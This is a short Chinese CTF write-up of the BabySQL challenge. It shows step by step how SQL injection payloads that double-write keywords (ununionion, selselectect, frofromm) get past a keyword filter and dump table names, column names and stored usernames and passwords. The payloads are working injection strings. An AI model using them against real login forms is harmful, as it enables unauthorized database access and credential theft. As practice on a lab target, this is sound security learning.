[极客大挑战 2019]BabySQL

sql注入学习

  • 首先尝试万能密码
    admin
    admin' or 1=1#
    失败

  • 一般注入
    admin
    admin' union select 1,2,3#
    sql注入学习
    失败
    这里只显示了1,2,3#,怀疑是过滤了union,select`等关键字,尝试双鞋绕过

  • 双写绕过
    admin
    admin' ununionion selselectect 1,2,3#
    sql注入学习
    ok,这下就好办了

  • 爆表
    admin
    admin' uniunionon selselectect 1,group_concat(table_name),3 frofromm infoorrmation_schema.tables whewherere table_schema=database()#
    sql注入学习
    注意这里的from和or也被过滤了需要双写

  • 爆列名
    admin
    admin' uniunionon selselectect 1,group_concat(column_name),3 frofromm infoorrmation_schema.columns whewherere table_name="b4bsql"#
    sql注入学习

  • 爆字段
    admin
    admin' uniunionon selselectect 1,group_concat(username),group_concat(passwoorrd) frofromm b4bsql#
    sql注入学习
    得到flag和一些。。。

本文作者:Author:     文章标题:sql注入学习记录(8)-[极客大挑战 2019]BabySQL(双写绕过)
本文地址:https://yuaneuro.cn/archives/90.html     
版权说明:若无注明,本文皆为“yuaneuro的小站”原创,转载请保留文章出处。
Last modification:April 9th, 2020 at 02:17 pm